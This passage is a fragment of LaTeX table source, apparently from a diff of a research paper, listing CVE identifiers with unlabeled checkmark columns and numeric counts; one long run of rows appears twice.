& & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-1869 & /checkmark & & & & & & /checkmark & & & & /checkmark & & & & & /checkmark & 1 & 110 & & \\ \midrule +CVE-2014-1904 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 128 & & \\ \midrule +CVE-2014-1932 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 124 & & \\ \midrule +CVE-2014-1933 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 116 & & \\ \midrule +CVE-2014-2053 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & 1 & 192 & & \\ \midrule +CVE-2014-2235 & /checkmark & & & & & /checkmark & & & /checkmark & & /checkmark & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-2525 & & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & 1 & 56 & & \\ \midrule +CVE-2014-3007 & /checkmark & & & & & /checkmark & & /checkmark & /checkmark & & & & & /checkmark & & /checkmark & 1 & 120 & & \\ \midrule +CVE-2014-3488 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 128 & & \\ \midrule +CVE-2014-3506 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 190 & & \\ \midrule +CVE-2014-3511 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & /checkmark & 1 & 182 & & \\ \midrule +CVE-2014-3576 & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 52 & & \\ \midrule +CVE-2014-3578 & /checkmark & & & & & & & & & & & & & & & /checkmark & 1 & 66 & & \\ \midrule +CVE-2014-3579 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 146 & & \\ \midrule +CVE-2014-3599 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 70 & & \\ \midrule +CVE-2014-3600 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 138 & & \\ \midrule +CVE-2014-3625 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 106 & & \\ \midrule +CVE-2014-3741 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 120 & & \\ \midrule +CVE-2014-3995 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 134 & & \\ \midrule +CVE-2014-4658 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 106 & & \\ \midrule +CVE-2014-6394 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-7143 & & & & & & & /checkmark & & /checkmark & & & & & & & & 2 & 44 & 46 & 46 \\ \midrule +CVE-2014-7192 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 120 & & \\ \midrule +CVE-2014-7193 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 106 & & \\ \midrule +CVE-2014-7202 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 3 & 138 & 150 & 142 \\ \midrule +CVE-2014-7203 & /checkmark & & & & & & & & & /checkmark & & /checkmark & & /checkmark & & & 1 & 138 & & \\ \midrule +CVE-2014-7205 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule +CVE-2014-8115 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 80 & & \\ \midrule +CVE-2014-8176 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 120 & & \\ \midrule +CVE-2014-8650 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule +CVE-2014-8681 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 116 & & \\ \midrule +CVE-2014-8682 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & & 1 & 124 & & \\ \midrule +CVE-2014-8991 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-9130 & /checkmark & & & & & /checkmark & & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule +CVE-2014-9682 & /checkmark & & & & & /checkmark & /checkmark & & & & & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-9720 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule +CVE-2014-9721 & /checkmark & & & & & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & 2 & 142 & 154 & 154 \\ \midrule +CVE-2014-10068 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-10077 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2015-0206 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & /checkmark & 1 & 194 & & \\ \midrule +CVE-2015-0209 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & /checkmark & 1 & 182 & & \\ \midrule +CVE-2015-0288 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 188 & & \\ \midrule +CVE-2015-0838 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2015-0846 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2015-1326 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 178 & & \\ \midrule +CVE-2015-1782 & & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2015-1788 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 186 & & \\ \midrule +CVE-2015-1791 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & /checkmark & & /checkmark & 1 & 192 & & \\ \midrule +CVE-2015-1792 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 194 & & \\ \midrule +CVE-2015-2068 & & & & & & /checkmark & /checkmark & & /checkmark & & /checkmark & & & & & & 7 & 56 & 60 & 56 \\ \midrule +CVE-2015-2156 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 82 & & \\ \midrule +CVE-2015-2296 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule +CVE-2015-2912 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & & 1 & 162 & & \\ \midrule +CVE-2015-2913 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2015-3010 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 142 & & \\ \midrule +CVE-2015-3195 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 196 & & \\ \midrule +CVE-2015-3196 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2015-3220 & /checkmark & & & & & & & & & & & & & & & & 1 & 96 & & \\ \midrule +CVE-2015-3253 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2015-4053 & & & & & & & & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 110 & & \\ \midrule +CVE-2015-4082 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2015-4412 & /checkmark & & & & & /checkmark & /checkmark & & & & & & & & & & 1 & 112 & & \\ \midrule +CVE-2015-4619 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 104 & & \\ \midrule +CVE-2015-4706 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 80 & & \\ \midrule +CVE-2015-5081 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule +CVE-2015-5147 & /checkmark & & & & & & & & & & & & & & & & 1 & 64 & & \\ \midrule +CVE-2015-5159 & /checkmark & & & & & & & & & & & & & & & & 1 & 160 & & \\ \midrule +CVE-2015-5211 & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & & /checkmark & 1 & 54 & & \\ \midrule +CVE-2015-5253 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2015-5254 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 148 & & \\ \midrule +CVE-2015-5607 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule +CVE-2015-6748 & /checkmark & & & & & & & & & & & /checkmark & & /checkmark & & & 1 & 102 & & \\ \midrule +CVE-2015-7294 & /checkmark & & & & & /checkmark & & /checkmark & & & /checkmark & & & /checkmark & & & 1 & 150 & & \\ \midrule +CVE-2015-7314 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule +CVE-2015-7316 & /checkmark & & & & & & & & & & & & & /checkmark & & & 1 & 98 & & \\ \midrule +CVE-2015-7559 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 156 & & \\ \midrule +CVE-2015-7809 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2015-8213 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2015-8309 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 168 & & \\ \midrule +CVE-2015-8310 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 108 & & \\ \midrule +CVE-2015-8747 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 104 & & \\ \midrule +CVE-2015-8748 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2015-8814 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule +CVE-2015-8968 & /checkmark & & & & & & & & & & & & & /checkmark & & & 1 & 130 & & \\ \midrule +CVE-2015-9235 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule +CVE-2015-9243 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 154 & & \\ \midrule +CVE-2015-9251 & /checkmark & & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & /checkmark & & /checkmark & 1 & 156 & & \\ \midrule +CVE-2016-0750 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 72 & & \\ \midrule +CVE-2010-0684 & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & 1 & 66 & & \\ \midrule +CVE-2010-2245 & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & & & 3 & 22 & 104 & 50 \\ \midrule +CVE-2010-5312 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2011-1772 & & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 94 & & \\ \midrule +CVE-2011-1950 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 58 & & \\ \midrule +CVE-2011-2732 & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & /checkmark & 1 & 54 & & \\ \midrule +CVE-2011-3871 & & & & & & & & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 104 & & \\ \midrule +CVE-2011-4104 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & /checkmark & 1 & 118 & & \\ \midrule +CVE-2011-4461 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule +CVE-2011-4838 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 174 & & \\ \midrule +CVE-2011-5036 & /checkmark & & & & & & & & & /checkmark & & & & & & /checkmark & 1 & 102 & & \\ \midrule +CVE-2012-1109 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 70 & & \\ \midrule +CVE-2012-1176 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 150 & & \\ \midrule +CVE-2012-2139 & /checkmark & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2012-2417 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 122 & & \\ \midrule +CVE-2012-3366 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 108 & & \\ \midrule +CVE-2012-3408 & /checkmark & & & & & /checkmark & & & /checkmark & & & & & & & & 1 & 108 & & \\ \midrule +CVE-2012-3458 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2012-3865 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2012-4386 & & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 74 & & \\ \midrule +CVE-2012-4387 & & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 82 & & \\ \midrule +CVE-2012-4520 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2012-5812 & & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 52 & & \\ \midrule +CVE-2012-6550 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 132 & & \\ \midrule +CVE-2012-6662 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2012-6684 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2012-6685 & /checkmark & & & & & & & & & & & /checkmark & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2013-0256 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & 1 & 192 & & \\ \midrule +CVE-2013-0262 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 178 & & \\ \midrule +CVE-2013-0263 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 170 & & \\ \midrule +CVE-2013-0294 & /checkmark & & & & & /checkmark & & & & & & & & & & & 1 & 104 & & \\ \midrule +CVE-2013-1607 & & & & & & & & & & & & & & & & & 3 & 32 & 34 & 32 \\ \midrule +CVE-2013-1801 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 112 & & \\ \midrule +CVE-2013-1812 & /checkmark & & & & & & & /checkmark & & /checkmark & & /checkmark & & /checkmark & & & 1 & 146 & & \\ \midrule +CVE-2013-1879 & & & & & & /checkmark & & & & /checkmark & /checkmark & & & & & & 1 & 82 & & \\ \midrule +CVE-2013-1880 & & & & & & /checkmark & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 86 & & \\ \midrule +CVE-2013-2013 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 106 & & \\ \midrule +CVE-2013-2035 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 84 & & \\ \midrule +CVE-2013-2132 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2013-2191 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & & & & 1 & 172 & & \\ \midrule +CVE-2013-3300 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2013-4002 & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 2 & 34 & 46 & 46 \\ \midrule +CVE-2013-4111 & & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 56 & & \\ \midrule +CVE-2013-4116 & /checkmark & & & & & & & & & /checkmark & & /checkmark & & /checkmark & & & 1 & 138 & & \\ \midrule +CVE-2013-4249 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2013-4353 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 188 & & \\ \midrule +CVE-2013-4413 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 118 & & \\ \midrule +CVE-2013-4477 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 132 & & \\ \midrule +CVE-2013-4562 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2013-4701 & /checkmark & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 120 & & \\ \midrule +CVE-2013-5093 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2013-5123 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule +CVE-2013-6044 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2013-6348 & & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 94 & & \\ \midrule +CVE-2013-6429 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2013-6430 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2013-6465 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2013-7370 & /checkmark & & & & & & & & & & & & & & & & 1 & 96 & & \\ \midrule +CVE-2013-7397 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 144 & & \\ \midrule +CVE-2013-7398 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 154 & & \\ \midrule +CVE-2013-7459 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2014-0012 & /checkmark & & & & & & /checkmark & & & & /checkmark & & & & & & 2 & 108 & 138 & 138 \\ \midrule +CVE-2014-0072 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 124 & & \\ \midrule +CVE-2014-0073 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-0110 & /checkmark & & & & & & & & & /checkmark & & & & & & /checkmark & 1 & 102 & & \\ \midrule +CVE-2014-0120 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 120 & & \\ \midrule +CVE-2014-0121 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2014-0177 & /checkmark & & & & & /checkmark & & & & /checkmark & & & & & & & 1 & 172 & & \\ \midrule +CVE-2014-0193 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2014-0225 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 118 & & \\ \midrule +CVE-2014-1202 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 96 & & \\ \midrule +CVE-2014-1402 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 2 & 124 & 150 & 150 \\ \midrule +CVE-2014-1403 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 180 & & \\ \midrule +CVE-2014-1604 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-1830 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2014-1832 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-1858 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-1859 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-1869 & /checkmark & & & & & & /checkmark & & & & /checkmark & & & & & /checkmark & 1 & 110 & & \\ \midrule +CVE-2014-1904 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 128 & & \\ \midrule +CVE-2014-1932 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 124 & & \\ \midrule +CVE-2014-1933 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 116 & & \\ \midrule +CVE-2014-2053 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & 1 & 192 & & \\ \midrule +CVE-2014-2235 & /checkmark & & & & & /checkmark & & & /checkmark & & /checkmark & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-2525 & & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & 1 & 56 & & \\ \midrule +CVE-2014-3007 & /checkmark & & & & & /checkmark & & /checkmark & /checkmark & & & & & /checkmark & & /checkmark & 1 & 120 & & \\ \midrule +CVE-2014-3488 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 128 & & \\ \midrule +CVE-2014-3506 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 190 & & \\ \midrule +CVE-2014-3511 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & /checkmark & 1 & 182 & & \\ \midrule +CVE-2014-3576 & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 52 & & \\ \midrule +CVE-2014-3578 & /checkmark & & & & & & & & & & & & & & & /checkmark & 1 & 66 & & \\ \midrule +CVE-2014-3579 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 146 & & \\ \midrule +CVE-2014-3599 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 70 & & \\ \midrule +CVE-2014-3600 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 138 & & \\ \midrule +CVE-2014-3625 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 106 & & \\ \midrule +CVE-2014-3741 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 120 & & \\ \midrule +CVE-2014-3995 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 134 & & \\ \midrule +CVE-2014-4658 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 106 & & \\ \midrule +CVE-2014-6394 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-7143 & & & & & & & /checkmark & & /checkmark & & & & & & & & 2 & 44 & 46 & 46 \\ \midrule +CVE-2014-7192 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 120 & & \\ \midrule +CVE-2014-7193 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 106 & & \\ \midrule +CVE-2014-7202 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 3 & 138 & 150 & 142 \\ \midrule +CVE-2014-7203 & /checkmark & & & & & & & & & /checkmark & & /checkmark & & /checkmark & & & 1 & 138 & & \\ \midrule +CVE-2014-7205 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule +CVE-2014-8115 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 80 & & \\ \midrule +CVE-2014-8176 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 120 & & \\ \midrule +CVE-2014-8650 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule +CVE-2014-8681 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 116 & & \\ \midrule +CVE-2014-8682 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & & 1 & 124 & & \\ \midrule +CVE-2014-8991 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-9130 & /checkmark & & & & & /checkmark & & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule +CVE-2014-9682 & /checkmark & & & & & /checkmark & /checkmark & & & & & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-9720 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule +CVE-2014-9721 & /checkmark & & & & & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & 2 & 142 & 154 & 154 \\ \midrule +CVE-2014-10068 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-10077 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2015-0206 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & /checkmark & 1 & 194 & & \\ \midrule +CVE-2015-0209 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & /checkmark & 1 & 182 & & \\ \midrule +CVE-2015-0288 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 188 & & \\ \midrule +CVE-2015-0838 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2015-0846 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2015-1326 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 178 & & \\ \midrule +CVE-2015-1782 & & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2015-1788 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 186 & & \\ \midrule +CVE-2015-1791 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & /checkmark & & /checkmark & 1 & 192 & & \\ \midrule +CVE-2015-1792 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 194 & & \\ \midrule +CVE-2015-2068 & & & & & & /checkmark & /checkmark & & /checkmark & & /checkmark & & & & & & 7 & 56 & 60 & 56 \\ \midrule +CVE-2015-2156 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 82 & & \\ \midrule +CVE-2015-2296 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule +CVE-2015-2912 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & & 1 & 162 & & \\ \midrule +CVE-2015-2913 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2015-3010 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 142 & & \\ \midrule +CVE-2015-3195 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 196 & & \\ \midrule +CVE-2015-3196 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2015-3220 & 